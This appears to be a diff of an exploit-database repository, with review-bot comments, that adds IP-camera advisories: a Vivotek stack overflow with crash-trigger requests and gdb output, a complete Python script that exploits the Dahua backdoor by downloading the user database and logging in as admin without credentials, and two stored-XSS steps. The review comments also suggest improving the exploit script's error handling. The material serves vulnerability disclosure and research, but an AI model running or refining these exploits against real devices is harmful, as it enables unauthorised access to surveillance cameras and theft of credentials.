$ nslookup 168.126.63.1
1.63.126.168.in-addr.arpa name = kns.kornet.net.
$ nslookup 168.126.63.2
2.63.126.168.in-addr.arpa name = kns2.kornet.net.


-[Other Information Disclosure]-
curl -v "http://192.168.57.20:80/webviewer/netinfo.dat"
192,168,57,20
192,168,2,100
00:0A:2F:XX:XX:XX
00:0A:2F:YY:YY:YY
255.255.255.0
192.168.57.1

-[MAC Address Details]-
Company: Artnix Inc.
Address: Seoul 137-819, KOREA, REPUBLIC OF
Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF
Type: IEEE MA-L

curl -v "http://192.168.57.20:80/webviewer/gw.dat"
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
192.168.57.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
0.0.0.0 192.168.57.1 0.0.0.0 UG 0 0 0 eth0

curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0"
Change GUI Language to English

[... and more]

[ETX]
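Review bot: `-[Hardcode l/p]-` lists `FTP: TCP/10021`, `TELNET: TCP/10023` and two `/etc/passwd` entries, but never says which account is reachable over which service or how 'hardcoded' was established (the same hash on a second unit or firmware image would do), so the claim is asserted rather than shown. The header carries `Full Disclosure: 0-day` with no vendor contact or timeline, and only `VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R` is marked Verified while the H1 and N1 firmware appear under the stack-overflow notes with addresses; state whether those two were tested on hardware or only disassembled. Minor: the `-[Manufacture Logo]-` ASCII art has lost its alignment and carries no information, and the redaction is inconsistent (MAC addresses masked as `XX:XX:XX`, credential material above printed in full).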

exploits/multiple/remote/44001.txt (Normal file, 143 lines)
@ -0,0 +1,143 @@
[STX]

Subject: Vivotek IP Cameras - Remote Stack Overflow
Researcher: bashis <mcw noemail eu> (September-October 2017)
PoC: https://github.com/mcw0/PoC
Release date: November 13, 2017
Full Disclosure: 43 days

Attack Vector: Remote
Authentication: Anonymous (no credentials needed)
Firmware Vulnerable: Only 2017 versions affected
Firmware Patched: October 2017 and higher

Device Model:
CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS,
FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA,
FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1,
FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379,
FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2,
FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377,
IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564,
MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possible more

Download Updated Firmware: http://www.vivotek.com/firmware/


[Timeline]

October 1, 2017: Reported findings with all details to Vivotek Cybersecurity
October 2, 2017: First response from Vivotek
October 5, 2017: ACK of findings from Vivotek
October 11, 2017: Vivotek reported first fixed Firmware
October 12, 2017: After request, Vivotek provided samples of fixed Firmware
October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help
October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory
November 1, 2017: Agreed on publication November 13, 2017
November 9, 2017: Checked few release notes, none mention security fix; pinged Vivotek with the question why not.
November 13, 2017: No reply from Vivotek, Full Disclosure as planned.


[Details]

Vivotek using modified version of Boa/0.94.14rc21, and the vulnerability has been introduced by Vivotek.

The stack overflow is triggered by "PUT" or "POST" request:

[PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n

However,
the absolutely minimal request to trigger the stack overflow is weird, most probably due to quick hack:
"[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"

This allows us to insert [JUNK] with 'Good bytes' up to 9182 bytes (0x1FFF) of the request:
"[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"


Notes:
1. B to I = $R4-$R11; X = $PC
2. Size of request availible in $R3 at the LDMFD
3. Max request size: 9182 bytes (0x1FFF)
4. "Start with "\n" in "\n\r\n\r\n" needed to jump with 0x00xxxxxx (if not $PC will be 0x0dxxxxxx)
5. Space (0x20) after ':' in 'Content-Length:' counting as one char of the 20 bytes
6. Stack not protected with "Stack canaries"
7. Good bytes: 0x01-0x09, 0x0b-0xff; Bad bytes: 0x00, 0x0a;
8. heap: Non-executable + Non-ASLR
9. stack: Non-executable + ASLR


[PoC]

$ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80

(gdb) target remote 192.168.57.20:23946
Remote debugging using 192.168.57.20:23946
0x76eb2c5c in ?? ()
(gdb) c
|
||||
Continuing.
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0x58585858 in ?? ()
|
||||
(gdb) bt
|
||||
#0 0x58585858 in ?? ()
|
||||
#1 0x000188f4 in ?? ()
|
||||
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
|
||||
(gdb) i reg
|
||||
r0 0x1 1
|
||||
r1 0x47210 291344
|
||||
r2 0x0 0
|
||||
r3 0x75 117
|
||||
r4 0x42424242 1111638594
|
||||
r5 0x43434343 1128481603
|
||||
r6 0x44444444 1145324612
|
||||
r7 0x45454545 1162167621
|
||||
r8 0x46464646 1179010630
|
||||
r9 0x47474747 1195853639
|
||||
r10 0x48484848 1212696648
|
||||
r11 0x49494949 1229539657
|
||||
r12 0x1 1
|
||||
sp 0x7e92dac0 0x7e92dac0
|
||||
lr 0x188f4 100596
|
||||
pc 0x58585858 0x58585858
|
||||
cpsr 0x60000010 1610612752
|
||||
(gdb)
|
||||
|
||||
|
||||
$ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80
|
||||
|
||||
(gdb) target remote 192.168.57.20:23946
|
||||
Remote debugging using 192.168.57.20:23946
|
||||
0x76e82c5c in ?? ()
|
||||
(gdb) c
|
||||
Continuing.
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0x58585858 in ?? ()
|
||||
(gdb) bt
|
||||
#0 0x58585858 in ?? ()
|
||||
#1 0x000188f4 in ?? ()
|
||||
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
|
||||
(gdb) i reg
|
||||
r0 0x1 1
|
||||
r1 0x47210 291344
|
||||
r2 0x0 0
|
||||
r3 0x4f 79
|
||||
r4 0x42424242 1111638594
|
||||
r5 0x43434343 1128481603
|
||||
r6 0x44444444 1145324612
|
||||
r7 0x45454545 1162167621
|
||||
r8 0x46464646 1179010630
|
||||
r9 0x47474747 1195853639
|
||||
r10 0x48484848 1212696648
|
||||
r11 0x49494949 1229539657
|
||||
r12 0x1 1
|
||||
sp 0x7ec9cac0 0x7ec9cac0
|
||||
lr 0x188f4 100596
|
||||
pc 0x58585858 0x58585858
|
||||
cpsr 0x60000010 1610612752
|
||||
(gdb)
|
||||
|
||||
Have a nice day
|
||||
/bashis
|
||||
|
||||
[ETX]
|
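Review bot: the size figures in [Details] and in note 3 contradict each other: 0x1FFF is 8191 decimal, not 9182, so either the hex or the decimal value is a typo and the real maximum should be stated once. The rest of the numbers hold up: note 2 says the request length lands in $R3 at the LDMFD, and the register dumps show r3 = 0x75 (117) for the full POST line and r3 = 0x4f (79) for the minimal "PUTContent-Length:..." form, which is exactly the byte count of each echoed request (41 + 15 + 20 + 36 + 5 and 3 + 15 + 20 + 36 + 5). The Device Model list repeats several entries (FD8166A three times; FD8167A, FD8167AS, FD8169A, FD8169AS, FD816B, FD816BA, FD816C, FD816CA and FD8182 twice) and reads like an unfiltered SKU dump; deduplicate it. Notes 6, 8 and 9 (no stack canaries, heap non-executable but not randomised, stack non-executable with ASLR) are the facts that decide whether this goes beyond a crash, so they belong with the request description above the [PoC] section rather than at the end of a numbered list.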
663 exploits/multiple/remote/44002.py Executable file
@@ -0,0 +1,663 @@
#!/usr/bin/python2.7

if False: '''

2017-05-03

Public rerelease of Dahua Backdoor PoC
https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py

2017-03-20

With my newfound knowledge of vulnerable devices out there with an unbelievable number of more than 1 million Dahua / OEM units, where knowledge comes from a report made by NSFOCUS and my own research on shodan.io.

With this knowledge, I will not release the Python PoC to the public as before said of April 5, as it is not necessary when the PoC has already been verified by IPVM and other independent security researchers.

However, I'm open to share the PoC with serious security researchers if so desired, please e-mail me off list and be clear about who you are so I do not take you for a beggar, which I ignore.

NSFOCUS report: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/

/bashis


[STX]

I'm speechless, and almost don't know what I should write... I (hardly) can't believe what I have just found.

I have just discovered (to what I strongly believe is backdoor) in Dahua DVR/NVR/IPC and possible all their clones.

Since I am convinced this is a backdoor, I have my own policy to NOT notify the vendor before the community.
(I simply don't want to listen on their poor excuses, their tryings to keep me silent for informing the community)

In short:
You can delete/add/change name on the admin users, you change password on the admin users - this backdoor simply don't care about that!
It uses whatever names and passwords you configuring - by simply downloading the full user database and use your own credentials!

This is so simple as:
1. Remotely download the full user database with all credentials and permissions
2. Choose whatever admin user, copy the login names and password hashes
3. Use them as source to remotely login to the Dahua devices

This is like a damn Hollywood hack, click on one button and you are in...


Below PoC you will find here: https://github.com/mcw0/PoC/dahua-backdoor.py
Update:
Dahua has requested me to temporally remove the PoC code, will be back here again 5th April. (30 days)
/Sorry, bashis

Please have understanding of the quick hack of the PoC, I'm sure it could be done better.

Have a nice day
/bashis

$ ./dahua-backdoor.py --rhost 192.168.5.2

[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]

[i] Remote target IP: 192.168.5.2
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 2 found
[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM
[>] Requesting our session ID
[<] 200 OK
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 100385023 }

[>] Logging out
[<] 200 OK

[*] All done...
$

$ ./dahua-backdoor.py --rhost 192.168.5.3

[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]

[i] Remote target IP: 192.168.5.3
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 3 Found
[i] Choosing Admin Login: admin, Auth: 27
[>] Requesting our session ID
[<] 200 OK
[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
[i] Random value to encrypt with: 1958557123
[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 1175887285 }

[>] Logging out
[<] 200 OK

[*] All done...
$

[ETX]
'''


#
# Dahua backdoor PoC Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
# Credentials: No Credentials needed (Exploited as Anonymous)
# Note: PoC intentionally missing essential details to be direct usable for anything else than login/logout.
#
# Vendor URL: http://www.dahuasecurity.com/
#
# Patched firmware can be downloaded from newly introduced 'Firmware download function'
# (Don't mind the old date stamps, these should all be the hotfixed updates)
# http://www.dahuasecurity.com/download_111.html
#
#
# -[ Facts ]-
#
# 1) Requirements
# 1.1) You need to know what you want to request
# 1.2) You need to know how to request what you want
# - When you know this, remote device will give you what you want, without any complains
# 1.3) You need to know how to process the results of your requests
# 1.4) You need to know how to send your processed results back to remote device
# - When you know this, you will be granted full access to remote device, without any complains
#
# 2) Direct file access
# 2.1) /mnt/mtd/Config/{passwd|Account1} downloadable with /current_config/{passwd|Account1} by HTTP/HTTPS
# 2.2) User database hash in format: <username>:<realm>:<password>
# 2.3) /mnt/mtd are read/writable - so sensitive files could (must!) be somewhere else, protected, and not remotely accessible.
# 2.4) /mnt/mtd/Config contains also of intentionally public accessible files (WebCapConfig and preLanguage)
# 2.5) There is several other files that should (must!) not be remotely accessible either (Config1 for example)
#
# 3) Passing the hash
# 3.1) Generation 1 - Base64 encoded (Not in this PoC, since I don't know what I want to request, but I could guess same format as 2.2)
# 3.2) Generation 2 - No processing needed; only to pass on the hash
# 3.3) Generation 3 - New 'improved' MD5 random hash must be generated with additional details, that we simply requesting from remote
# 3.4) New MD5 random hash has to be generated as: <username>:<random>:[MD5 format as in user database (2.2)]
#
# - Not less than three times, Dahua have been poking around in the file structure and in the relevant functions of the source code
# - Changed file names, structure of user database, added/removed both public and sensitive files.
# - And never once wondered;
# 1. 'Hm, why I'm allowed to access these newly added files without login request?'
# 2. 'Hm, I know that file is the user database, can I access that one too without login request?'
# 3. 'Hm, I know that file is the device config, can I access that one too without login request?'
# - Really? Are you kidding me?
#
# When you know all above, and have full access to remote device, the whole thing looks so easy, actually way too easy to be true.
#
#
# -[ Most importantly ]-
#
# 1) Undocumented direct access to certain file structures, and used from some of Dahuas own .js to load 'WebCapConfig' and 'preLanguage'
# 2) Direct and indirect re-usage of hashes possible, however with MD5 hash 'security improvements' in Generation 3
# 3) Essential needs for successful login we simply request from remote device and process, no need to guess nor bruteforce anything
# 4) Abnormally wide range of products and firmware versions that share same reliable attack method, to be 'just an vulnerability'
# - True vulnerability over a wide range products and firmware versions have always some unexpected anomalies, which is expected
# 5) Dahua has lots of debug code compiled into the Firmware that may/normally listening on TCP/6789, although protected by l/p authorization
# - Dahua has been kindly asked to remove all debug code from production firmware, as this access and code do not belong in end user devices
# 6) The admin account '888888' is claimed by Dahua to be limited for local login with 'monitor and mouse' only, and not from remote
# - However, that validation is done locally in users browser by 'loginEx.js', and has therefore no practical effect
# 7) The 'hotfix' remediation was done by hardcoding from full access to two intentionally public accessible files (WebCapConfig and preLanguage)
#
#
# -[ Did Dahua confirm the backdoor by mistake? ]-
#
# Don't know if you noticed that the 'new' patches that was pushed out days after my initital post at IPVM,
# they had different old date stamps, and same old date stamps (as on the archives) was on all inside binaries as well.
#
# Screenshots
# https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
# https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
#
# URL
# http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php
# https://dahuawiki.com/images/Firmware/DVR/Q2.2017/
#
# And, bit interesting, Dahua continued to use old date stamps on newly generated firmware updates/hotfixes
#
# -[ Method of discovery ]-
#
# Researching by dissasembling of Dahuas main binaries 'Challenge' / 'Sonia'
# What got me curios, was abnormally empty inside of the image I was initally checking, and of course the big binary 'Challenge'
# What got me on track, was the lack of references to sensitive files
# Missing user database and Config in the archives, only a unused and read-only /etc/passwd was found
# Noticed that sensitive files was generated by the binary at startup
# Noticed checkings after sensitive files in different directories, to use 'defaults' as last resource
# Noticed the mix of intentionally public files and sensitive files in same directory
# Reading of the .htm and .js that was found in the image
# ...etc.
#
#
# -[ My Full Disclosure Policy ]-
#
# Normal vulnerabilites: I collect enough information about my findings and trying to notify the vendor to have coordinated disclosure
# Backdoors: If/when they are intended, the vendors wants to hide/keep them (of course), what would you suggest? Notify the vendor or Full Disclosure?
# Proof of claim: Screenshots or some Youtube video would not proof anything, so the claim couldn't be posted without real hard cold facts
# - Professionals within the CCTV industry needed to know, and the only place I knew were many of them, was at IPVM, and therefore the first post was made there.
#
#
# -[ Next Generation Backdoors ]-
#
# That is in my opinion vendors P2P Cloud solutions.
#
# With P2P, these kind of backdoor implementations as shown in this PoC will then not be needed,
# since with P2P you practically giving away your credentials and addresses to your devices!
# And the connection to P2P, your devices initiates and keeps open. (For me, it is similar to reverse shell)
#
#
# -[ Hat's ]-
#
# I don't wear hats, I wear caps... (when it's cold)
#
#
# -[ Function of this PoC code ]-
#
# 1) Check and dump the remote user database (Generation 2 or 3)
# 2) Find first availible admin user and extract their login/pwd hash
# 3) Request session ID, compute new hash if needed (Generation 3)
# 4) Login and logout to/from remote device
#
#
# -[ Credits ]-
#
# binwalk (https://github.com/devttys0/binwalk)
# - Nothing easy could been done without binwalk, awesome tool. Thanks!
#
# IPVM (https://ipvm.com/)
# - For pickup of the claim and to make PoC report, so this Python PoC could be taken down.
#
# Full Disclosure (http://seclists.org/fulldisclosure/)
# - For existing, without your e-mail list, sensitive stuff would be quite difficult to uncover.
# - Fyodor, thanks again.
#
# And, big thanks to all authors for all other stuff and tools that's needed to successfully execute research within binaries
# - To many for naming.
#
# Have a nice day
# /bashis
#

import string
import sys
import socket
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import json
import commentjson # pip install commentjson
import hashlib

class HTTPconnect:

def __init__(self, host, proto, verbose, creds, Raw):
self.host = host
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw

def Send(self, uri, query_headers, query_data,ID):
self.uri = uri
self.query_headers = query_headers
self.query_data = query_data
self.ID = ID

# Connect-timeout in seconds
timeout = 5
socket.setdefaulttimeout(timeout)

url = '{}://{}{}'.format(self.proto, self.host, self.uri)

if self.verbose:
print "[Verbose] Sending:", url

if self.proto == 'https':
if hasattr(ssl, '_create_unverified_context'):
print "[i] Creating SSL Unverified Context"
ssl._create_default_https_context = ssl._create_unverified_context

if self.credentials:
Basic_Auth = self.credentials.split(':')
if self.verbose:
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
try:
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
except Exception as e:
print "[!] Basic Auth Error:",e
sys.exit(1)

if self.query_data:
request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)
else:
request = urllib2.Request(url, None, headers=self.query_headers)
response = urllib2.urlopen(request)
# print response
if response:
print "[<] {} OK".format(response.code)

if self.Raw:
return response
else:
html = response.read()
return html


class Dahua_Backdoor:

def __init__(self, rhost, proto, verbose, creds, Raw):
self.rhost = rhost
self.proto = proto
self.verbose = verbose
self.credentials = creds
self.Raw = Raw

#
# Generation 2
#
def Gen2(self,response,headers):
self.response = response
self.headers = headers

html = self.response.readlines()
if self.verbose:
for lines in html:
print "{}".format(lines)
#
# Check for first availible admin user
#
for line in html:
if line[0] == "#" or line[0] == "\n":
continue
line = line.split(':')[0:25]
if line[3] == '1': # Check if user is in admin group
USER_NAME = line[1] # Save login name
PWDDB_HASH = line[2]# Save hash
print "[i] Choosing Admin Login [{}]: {}, PWD hash: {}".format(line[0],line[1],line[2])
break

#
# Login 1
#
print "[>] Requesting our session ID"
query_args = {"method":"global.login",
"params":{
"userName":USER_NAME,
"password":"",
"clientType":"Web3.0"},
"id":10000}

URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)

json_obj = json.load(response)
if self.verbose:
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))

#
# Login 2
#
print "[>] Logging in"

query_args = {"method":"global.login",
"session":json_obj['session'],
"params":{
"userName":USER_NAME,
"password":PWDDB_HASH,
"clientType":"Web3.0",
"authorityType":"OldDigest"},
"id":10000}

URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,json_obj['session'])
print response.read()

#
# Wrong username/password
# { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1997483520 }
# { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1997734656 }
#
# Successfull login
# { "id" : 10000, "params" : null, "result" : true, "session" : 1626533888 }
#

#
# Logout
#
print "[>] Logging out"
query_args = {"method":"global.logout",
"params":"null",
"session":json_obj['session'],
"id":10001}

URI = '/RPC2'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
return response

#
# Generation 3
#
def Gen3(self,response,headers):
self.response = response
self.headers = headers

json_obj = commentjson.load(self.response)
if self.verbose:
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))

#
# Check for first availible admin user
#
for who in json_obj[json_obj.keys()[0]]:
if who['Group'] == 'admin': # Check if user is in admin group
USER_NAME = who['Name'] # Save login name
PWDDB_HASH = who['Password'] # Save hash
print "[i] Choosing Admin Login: {}".format(who['Name'])
break
#
# Request login
#
print "[>] Requesting our session ID"
query_args = {"method":"global.login",
"params":{
"userName":USER_NAME,
"password":"",
"clientType":"Web3.0"},
"id":10000}

URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)

json_obj = json.load(response)
if self.verbose:
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
#
# Generate login MD5 hash with all required info we have downloaded
#
RANDOM = json_obj['params']['random']
PASS = ''+ USER_NAME +':' + RANDOM + ':' + PWDDB_HASH + ''
RANDOM_HASH = hashlib.md5(PASS).hexdigest().upper()

print "[i] Downloaded MD5 hash:",PWDDB_HASH
print "[i] Random value to encrypt with:",RANDOM
print "[i] Built password:",PASS
print "[i] MD5 generated password:",RANDOM_HASH

#
# Login
#
print "[>] Logging in"

query_args = {"method":"global.login",
"session":json_obj['session'],
"params":{
"userName":USER_NAME,
"password":RANDOM_HASH,
"clientType":"Web3.0",
"authorityType":"Default"},
"id":10000}

URI = '/RPC2_Login'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,json_obj['session'])
print response.read()

# Wrong username/password
# { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1156538295 }
# { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1175812023 }
#
# Successfull login
# { "id" : 10000, "params" : null, "result" : true, "session" : 1175746743 }
#

#
# Logout
#
print "[>] Logging out"
query_args = {"method":"global.logout",
"params":"null",
"session":json_obj['session'],
"id":10001}

URI = '/RPC2'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
return response

#
# Validate correctness of HOST, IP and PORT
#
class Validate:

def __init__(self,verbose):
self.verbose = verbose

# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP

ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True

# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT

if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True

# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST

try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False



if __name__ == '__main__':

#
# Help, info and pre-defined values
#
INFO = '[Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]\n'
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
raw_request = True
rhost = '192.168.5.2' # Default Remote HOST
rport = '80' # Default Remote PORT
creds = False # creds = 'user:pass'


#
# Try to parse all arguments
#
try:
arg_parser = argparse.ArgumentParser(
prog=sys.argv[0],
description=('[*] '+ INFO +' [*]'))
arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
if creds:
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: %s\n" % str(e)
sys.exit(1)

# We want at least one argument, so print out help
if len(sys.argv) == 1:
arg_parser.parse_args(['-h'])

print "\n[*]",INFO

if args.verbose:
verbose = args.verbose
#
# Check validity, update if needed, of provided options
#
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'

if creds and args.auth:
creds = args.auth

if args.rport:
rport = args.rport

if args.rhost:
rhost = args.rhost

# Check if RPORT is valid
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)

# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)

#
# Validation done, start print out stuff to the user
#
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:",rhost
print "[i] Remote target PORT:",rport

rhost = rhost + ':' + rport

headers = {
'X-Requested-With' : 'XMLHttpRequest',
'X-Request' : 'JSON',
'User-Agent':'Dahua/2.0; Dahua/3.0'
}

#
# Try to find /current_config/passwd user database (Generation 2)
#
try:
print "[>] Checking for backdoor version"
URI = "/current_config/passwd"
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None)
print "[!] Generation 2 found"
reponse = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request).Gen2(response,headers)
except urllib2.HTTPError as e:
#
# If not, try to find /current_config/Account1 user database (Generation 3)
#
if e.code == 404:
try:
URI = '/current_config/Account1'
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None)
print "[!] Generation 3 Found"
response = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request).Gen3(response,headers)
except urllib2.HTTPError as e:
if e.code == 404:
print "[!] Patched or not Dahua device! ({})".format(e.code)
sys.exit(1)
else:
print "Error Code: {}".format(e.code)
except Exception as e:
print "[!] Detect of target failed ({})".format(e)
sys.exit(1)

print "\n[*] All done...\n"
sys.exit(0)
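Review bot: the version-detection block at the end can report success without having done anything: the outer `except urllib2.HTTPError as e:` only acts on `e.code == 404`, so a device that answers /current_config/passwd with 401 or 403 (what a patched device should do) falls through the `if` with nothing printed and reaches `print "\n[*] All done...\n"` / `sys.exit(0)`; the Generation 3 branch has the same gap, since its `else: print "Error Code: {}"` does not exit either. Add an `else` that prints the code and exits non-zero, mirroring the 404 handler. Smaller points in the same region and in the two Gen methods: `reponse = Dahua_Backdoor(...).Gen2(...)` misspells the variable (harmless, but inconsistent with the Gen3 call); in Gen2 and Gen3 nothing assigns USER_NAME / PWDDB_HASH when no admin entry is found, so the later reference raises NameError, which the trailing `except Exception` then reports as "[!] Detect of target failed" (or, if that handler belongs to the inner try, surfaces as a raw traceback), so initialise both to None and bail out with a clear message; `Validate.Port` calls `int()` on user input without a try/except and will traceback on a non-numeric --rport; and `ssl._create_default_https_context = ssl._create_unverified_context` disables certificate verification process-wide, which is expected against cameras with self-signed certificates but deserves a comment. The logout requests send the string "null" for "params" rather than JSON null; the device accepts it per the sample output, but it should be the literal None so json.dumps emits null.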
19 exploits/php/webapps/43988.txt Normal file
@@ -0,0 +1,19 @@
######################################################################################
# Exploit Title: PHP Scripts Mall Doctor Search Script 1.0.2 has Stored XSS.
# Date: 06.02.2018
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/doctor-search-script/
# Category: Web Application
# Version: 1.0.2
# Tested on: Linux Mint
# CVE: CVE-2018-6655
#######################################################################################

*Proof of Concept*
1. Login as a user
2. Goto "Edit Profile"
3. Edit any field with "<script>alert("PKP")</script>"
4. Save Profile
5. You will be having a popup "PKP"
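Review bot: the reproduction steps never identify the vulnerable input or where the stored payload renders; "Edit any field" in step 3 and the popup in step 5 only show the submitting user seeing their own script, which on its own is self-XSS. To support the "Stored XSS" title and the assigned CVE-2018-6655, name the profile field and the request parameter that carries it (the form's POST target would do), and show the payload executing in a second context, for example the public doctor profile page viewed by a visitor or the admin's user listing. Minor: the title line ends with a full stop, unlike the other three advisories in this batch.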
20 exploits/php/webapps/43989.txt Normal file
@@ -0,0 +1,20 @@
######################################################################################
|
||||
# Exploit Title: Multilanguage Real Estate MLM Script - Stored XSS
|
||||
# Date: 06.02.2018
|
||||
# Exploit Author: Prasenjit Kanti Paul
|
||||
# Web: http://hack2rule.wordpress.com/
|
||||
# Vendor Homepage: https://www.phpscriptsmall.com/
|
||||
# Software Link: http://www.exclusivescript.com/product/y2OP4658391/php-scripts/multilanguage-real-estate-mlm-script
|
||||
# Category: Web Application
|
||||
# Version: =>3.0
|
||||
# Tested on: Linux Mint
|
||||
# CVE: NA
|
||||
#######################################################################################
|
||||
|
||||
Proof of Concept
|
||||
=================
|
||||
1. Login as a user
|
||||
2. Goto "Edit Profile"
|
||||
3. Edit any field with "<script>alert("PKP")</script>"
|
||||
4. Save Profile
|
||||
